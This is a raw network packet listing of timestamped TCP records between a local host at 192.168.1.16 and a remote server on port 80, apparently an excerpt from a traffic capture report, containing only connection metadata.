Aug 23, 2017 11:21:37.440181971 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.440220118 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.440939903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.440963030 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.441106081 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.441138983 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.452683926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.452898026 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.452934980 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.455705881 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.455918074 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.455955029 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.463901997 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.463932991 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.464122057 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.464158058 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.469625950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.469647884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.469871998 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.469908953 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.481512070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.481535912 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.481708050 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.481745005 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.487133026 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.487155914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.487168074 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.487333059 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.487370968 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.495955944 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.495980024 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.495987892 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.496207952 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.496282101 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.500082970 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.500113010 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.500276089 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.500304937 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.504024029 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.504049063 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.504190922 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.504221916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.513773918 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.513799906 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.513808966 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.513953924 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.513994932 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.518338919 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.518363953 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.518573999 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.518624067 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.521066904 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.521080971 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.521272898 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.521302938 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.527731895 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.527928114 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.527959108 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.532089949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.532301903 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.532346964 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.538146019 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.538161993 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.538588047 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.538626909 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.544492960 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.544507980 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.544714928 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.544759035 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.549196959 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.549221039 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.549447060 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.549494028 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.553561926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.553576946 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.553781986 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.553829908 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.562161922 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.562177896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.562405109 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.562460899 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.566384077 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.566411018 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.566608906 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.566664934 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.570218086 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.570384026 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.570426941 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.577975988 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.578068972 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.578092098 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.581631899 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.581645966 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.581728935 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.581752062 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.585026979 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.585042000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.585123062 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.585145950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.589128017 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.589143038 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.589222908 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.589246035 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.592869043 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.592885017 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.593019009 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.593038082 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.599680901 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.599694014 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.599831104 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.599849939 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.600388050 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.600409985 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.600752115 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.600788116 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.607654095 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.607667923 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.608036995 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.608067036 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.612788916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.612802029 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.612926960 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.612947941 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.623115063 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.623127937 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.623131990 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.623270988 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.623292923 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.627536058 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.627682924 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.627705097 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.630021095 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.630433083 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.630455971 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.641339064 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.641350985 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.641458035 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.641479969 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.645574093 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.645608902 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.645818949 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.645838022 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.650665998 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.650679111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.650787115 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.650810957 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.651710033 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.651721954 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.651829958 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.651854992 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.665529013 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.665555000 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.665656090 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.665679932 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.666546106 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.666574955 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.666708946 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.666727066 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.673573017 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.673585892 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.673686028 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.673702002 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.682652950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.682667971 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.682734966 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.682981968 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.683017015 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.684216022 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.684237957 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.684366941 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.684392929 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.696129084 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.696429968 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.696487904 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.700484037 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.700496912 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.700787067 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.700814962 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.701467991 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.701488018 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.701910973 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.701941013 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.711431980 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.711446047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.711647987 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.711683035 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.717407942 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.717421055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.717595100 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.717627048 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.734481096 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.734504938 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.734635115 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.734652996 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.759416103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.759439945 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.759551048 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.759573936 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.762320042 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.762334108 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.762418032 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.762439013 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.775546074 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.775571108 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.775681019 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.775701046 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.792032957 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.792053938 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.792059898 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.792223930 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.792247057 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.807887077 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.808109045 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.808146954 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.810097933 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.810247898 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.810278893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.823339939 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.823374033 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.823496103 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.823512077 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.824934959 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.824960947 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.825128078 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.825140953 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.835726023 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.835747957 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.835850000 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.835865974 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.839773893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.839915037 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.839932919 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.847239017 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.847373009 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.847390890 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.852632046 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.852670908 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.853069067 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.853097916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.854641914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.854671001 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.854785919 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.854804039 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.863723993 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.863753080 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.863877058 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.863894939 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.868818998 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.868943930 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.868962049 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.870940924 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.871095896 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.871114969 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.872608900 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.873008013 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.873032093 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.879481077 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.879632950 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.879651070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.883842945 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.883873940 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.884007931 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.884026051 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.888737917 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.888770103 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.888865948 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.888884068 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.889354944 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.889381886 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.889494896 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.889508963 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.898799896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.898818970 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.899185896 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.899211884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.908724070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.908737898 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.909181118 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.909205914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.920766115 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.920778990 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.920945883 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.920964003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.923583031 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.923597097 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.923964024 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.923980951 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.932507992 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.932522058 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.932893991 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.932912111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.938421965 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.938436031 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.938833952 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.938849926 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.952510118 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.952522993 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.953419924 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.953440905 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.961344004 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.961364031 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.961373091 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.961389065 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.961410999 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.961572886 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.961592913 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.970591068 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.970613003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.970622063 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.970701933 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.970722914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.972098112 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.972110987 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.972454071 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.972477913 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.985735893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.985749960 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.985950947 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.985971928 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.991655111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.991679907 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.992115021 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:37.992136002 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.995426893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.995445967 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:37.995592117 MESZ	49196	80	192.168.1.16	104.24.116.148
